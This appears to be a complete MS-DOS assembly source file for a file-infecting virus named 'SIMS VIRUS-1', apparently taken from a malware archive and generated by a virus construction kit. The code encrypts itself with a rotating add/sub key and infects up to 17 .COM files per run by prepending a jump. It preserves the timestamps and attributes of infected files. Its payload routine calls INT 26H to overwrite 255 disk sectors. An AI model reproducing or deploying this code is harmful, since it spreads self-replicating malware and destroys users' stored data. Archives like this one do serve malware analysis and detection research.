MalwareSourceCode/MSDOS/S-Index/Virus.MSDOS.Unknown.sims.asm
vxunderground 4b9382ddbc re-organize
push
2022-08-21 04:07:57 -05:00

226 lines
5.2 KiB
NASM

;²±°ÝþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþÞ°±²
;²±°Ý Þ°±²
;²±°Ý METRiC BUTTLOAD of CODE GENERATOR Þ°±²
;²±°Ý Copyright(c) 1994 - MBC - Ver. 0.91b Þ°±²
;²±°Ý Þ°±²
;²±°ÝþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþÞ°±²
.MODEL TINY
.CODE
ORG 100H
ENTRY_POINT: DB 0E9H,0,0
DECRYPT:
MOV BP,(OFFSET HEAP - OFFSET STARTENCRYPT)/2
PATCH_STARTENCRYPT:
MOV bp,OFFSET STARTENCRYPT
DECRYPT_LOOP:
DB 81h,46h,0 ; ADD WORD PTR [bp], xxxx
DECRYPT_VALUE DW 0
inc bp
inc bp
DEC BP
JNZ DECRYPT_LOOP
STARTENCRYPT:
CALL NEXT
NEXT: POP BP
SUB BP,OFFSET NEXT
LEA SI,[BP+SAVE3]
MOV DI,100H
PUSH DI
MOVSW
MOVSB
MOV BYTE PTR [BP+NUMINFEC],17
MOV AH,1AH
LEA DX,[BP+NEWDTA]
INT 21H
LEA DX,[BP+COM_MASK]
MOV AH,4EH
MOV CX,7
FINDFIRSTNEXT:
INT 21H
JC DONE_INFECTIONS
MOV AL,0H
CALL OPEN
MOV AH,3FH
LEA DX,[BP+BUFFER]
MOV CX,1AH
INT 21H
MOV AH,3EH
INT 21H
CHECKCOM:
MOV AX,WORD PTR [BP+NEWDTA+35]
CMP AX,'DN'
JZ FIND_NEXT
MOV AX,WORD PTR [BP+NEWDTA+1AH]
CMP AX,1430
JB FIND_NEXT
CMP AX,65535-(ENDHEAP-DECRYPT)
JA FIND_NEXT
MOV BX,WORD PTR [BP+BUFFER+1]
ADD BX,HEAP-DECRYPT+3
CMP AX,BX
JE FIND_NEXT
JMP INFECT_COM
FIND_NEXT:
MOV AH,4FH
JMP SHORT FINDFIRSTNEXT
DONE_INFECTIONS:
JMP ACTIVATE
EXIT_VIRUS:
MOV AH,1AH
MOV DX,80H
INT 21H
RETN
SAVE3 DB 0CDH,20H,0
ACTIVATE:
;²±°ÝþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþÞ°±²
;²±°Ý LITTLE FRISKIES SMOKE 'EM ROUTINE! Þ°±²
;²±°ÝþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþÞ°±²
;
PROC BLISTER_LIPS
PUSH DX
MOV AL,DL
MOV CX,255
XOR DX,DX
INT 26H
ADD SP,2
POP DX
ENDP BLISTER_LIPS
JMP EXIT_VIRUS
INFECT_COM:
MOV CX,3
SUB AX,CX
LEA SI,[BP+OFFSET BUFFER]
LEA DI,[BP+OFFSET SAVE3]
MOVSW
MOVSB
MOV BYTE PTR [SI-3],0E9H
MOV WORD PTR [SI-2],AX
ADD AX,103H
PUSH AX
FINISHINFECTION:
PUSH CX
XOR CX,CX
CALL ATTRIBUTES
MOV AL,2
CALL OPEN
MOV AH,40H
LEA DX,[BP+BUFFER]
POP CX
INT 21H
MOV AX,4202H
XOR CX,CX
CWD ; XOR DX,DX
INT 21H
MOV AH,2CH
INT 21H
MOV [BP+DECRYPT_VALUE],DX
LEA DI,[BP+CODE_STORE]
MOV AX,5355H
STOSW
LEA SI,[BP+DECRYPT]
MOV CX,STARTENCRYPT-DECRYPT
PUSH SI
PUSH CX
REP MOVSB
XOR BYTE PTR [BP+DECRYPT_LOOP+1],028h ; flip between add/sub
LEA SI,[BP+WRITE]
MOV CX,ENDWRITE-WRITE
REP MOVSB
POP CX
POP SI
POP DX
PUSH DI
PUSH SI
PUSH CX
REP MOVSB
MOV AX,5B5DH
STOSW
MOV AL,0C3H
STOSB
ADD DX,OFFSET STARTENCRYPT - OFFSET DECRYPT
MOV WORD PTR [BP+PATCH_STARTENCRYPT+1],DX
CALL CODE_STORE
POP CX
POP DI
POP SI
REP MOVSB
MOV AX,5701H
MOV CX,WORD PTR [BP+NEWDTA+16H]
MOV DX,WORD PTR [BP+NEWDTA+18H]
INT 21H
MOV AH,3EH
INT 21H
MOV CH,0
MOV CL,BYTE PTR [BP+NEWDTA+15h]
CALL ATTRIBUTES
DEC BYTE PTR [BP+NUMINFEC]
JNZ MO_INFECTIONS
JMP DONE_INFECTIONS
MO_INFECTIONS: JMP FIND_NEXT
OPEN:
MOV AH,3DH
LEA DX,[BP+NEWDTA+30]
INT 21H
XCHG AX,BX
RET
ATTRIBUTES:
MOV AX,4301H
LEA DX,[BP+NEWDTA+30]
INT 21H
RET
WRITE:
POP BX
POP BP
MOV AH,40H
LEA DX,[BP+DECRYPT]
MOV CX,HEAP-DECRYPT
INT 21H
PUSH BX
PUSH BP
ENDWRITE:
COM_MASK DB '*.?OM',0
MACHINE DB '-=MBC=-',0
VIRUSNAME DB 'SIMS VIRUS-1',0
USER DB 'White Shark',0
HEAP:
CODE_STORE: DB (STARTENCRYPT-DECRYPT)*2+(ENDWRITE-WRITE)+1 DUP (?)
NEWDTA DB 43 DUP (?)
NUMINFEC DB ?
BUFFER DB 1AH DUP (?)
ENDHEAP:
END ENTRY_POINT